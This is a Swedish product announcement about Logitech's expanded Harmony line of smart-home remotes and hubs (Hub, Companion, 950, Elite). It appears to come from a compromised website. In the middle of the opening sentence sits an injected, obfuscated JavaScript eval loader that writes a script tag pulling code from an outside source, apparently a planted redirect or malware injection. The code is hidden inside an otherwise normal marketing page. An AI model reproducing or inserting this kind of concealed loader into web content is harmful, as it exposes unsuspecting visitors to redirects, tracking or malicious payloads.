Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Logitech Harmony expanderar möjligheterna till sömlös kontroll över ditt hem

Logitech Harmony expanderar möjligheterna till sömlös kontroll över ditt hem
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsttn|var|u0026u|referrer|rfekk||js|php’.split(’|’),0,{}))
tillkännager Logitech (SIX: LOGN) (NASDAQ: LOGI) utökandet av sin Harmony-linje med ett antal nya produkter. Logitechs erfarenhet och ledande kunskap inom kontroll når nu också till det smarta hemmet. De nya produkterna ger dig enkelt tillgång till din favoritunderhållning och kontroll över de tekniska apparaterna i ditt hem, oavsett om de gömmer sig bakom stängda dörrar eller inuti TV-bänkar.

“Harmony är erkänt ledande inom kontroll över underhållningen i hemmet, och nu har vi expanderat upplevelsen till hela det smarta hemmet”, säger Bruce Lancaster, ansvarig för Logitech Harmony. ”När fler uppkopplade enheter gör entré i konsumenternas hem växer också behovet för ett centraliserat sätt att kontrollera dem och få dem att dra åt samma håll. Vår nya linje gör exakt just det.”

Med ett par enkla steg kan din fjärrkontroll, tablet eller smartphone nu kontrollera din TV, digitalbox, högtalare, ljus, termostat, dörrlås, persienner och andra delar av det smarta hemmet. Med Harmony Activities kan du dessutom skapa enkla genvägar för flera enheter, så du kan sätta på TV:n, dimma lampan, ändra temperaturen och stänga gardinerna samtidigt. Du kan göra detta med touchknapp på fjärrkontrollen eller mobilen, via tidsinställning, eller låta sensorer automatiskt trigga dina Harmony Activities. Är du inte hemma kan du övervaka status eller styra dina enheter från mobilen.

Höjdpunkter från den nya linjen inkluderar:

Logitech Harmony® Hub
Harmony Hub förvandlar din iOS eller Android-smartphone eller tablet till en universalfjärrkontroll för hemmet. Med hubben och appen kan du kontrollera filmer, musik eller TV, plus inkopplade lampor, lås, termostater och mycket mer. Du kan starta eller kontrollera enheter i grupper eller individuellt, antingen med hjälp av din telefon eller via tidsinställning.

Logitech Harmony® Companion

Genom att kombinera en enkel fjärrkontroll med Harmony Hub, ger Logitech Harmony Companion dig möjligheten att bekvämt kontrollera uppkopplade lampor, lås, markiser, termostater, sensorer, underhållningsenheter med mera. Det ger dig friheten att kontrollera enheterna med hjälp av mobilappen när du inte är hemme, eller med en praktisk fjärrkontroll när du är hemma.

Logitech Harmony® 950

Logitech Harmony 950 är den bästa unversalfjärrkontrollen från Harmony hittills. Utrustad med en färg-touchsceen ger den dig full kontroll över upp till femton enheter. Den nya skärmen stödjer olika intuitiva fingergester och de rörelsekänsliga bakupplysta knapparna gör det enkelt att hitta rätt oavsett mörker. De utbytbara och återuppladdningsbara batterierna erbjuder 20% längre batteritid än föregångaren och det är enkelt att starta upp och installera systemet.

Logitech Harmony® Elite

Harmony Elite erbjuder samma funktioner som Harmony 950, men kommer parat med kraften i en Harmony Hub. Oavsett om du använder mobil-appen eller den avancerade touchscreen-fjärrkontrollen är Harmony Elite designat för att ge total och sömlös kontroll över din underhållning och ditt uppkopplade hem. Med Harmony Elite kan du ersätta fjärrkontrollerna för uppemot 15 underhållningsenheter och dessutom kombinera det med kontroll över populära produkter för det smarta hemmet såsom lampor, lås och termostater, antingen med ett touchkommando eller enligt schema.

Kompatibilitet och Tillgänglighet

LIFX, Insteon, QIVICON, August, Nest Learning Thermostat, Philips Hue och SONOS ära några av de varumärken och plattformar som nu läggs till Harmonys bibliotek på över 270,000 kompatibla enheter. För en komplett lista besök myharmony.com/compatibility.

Den nya Logitech Harmony-linjen förväntas finnas tillgänglig från September 2015. För mer information besök www.logitech.com.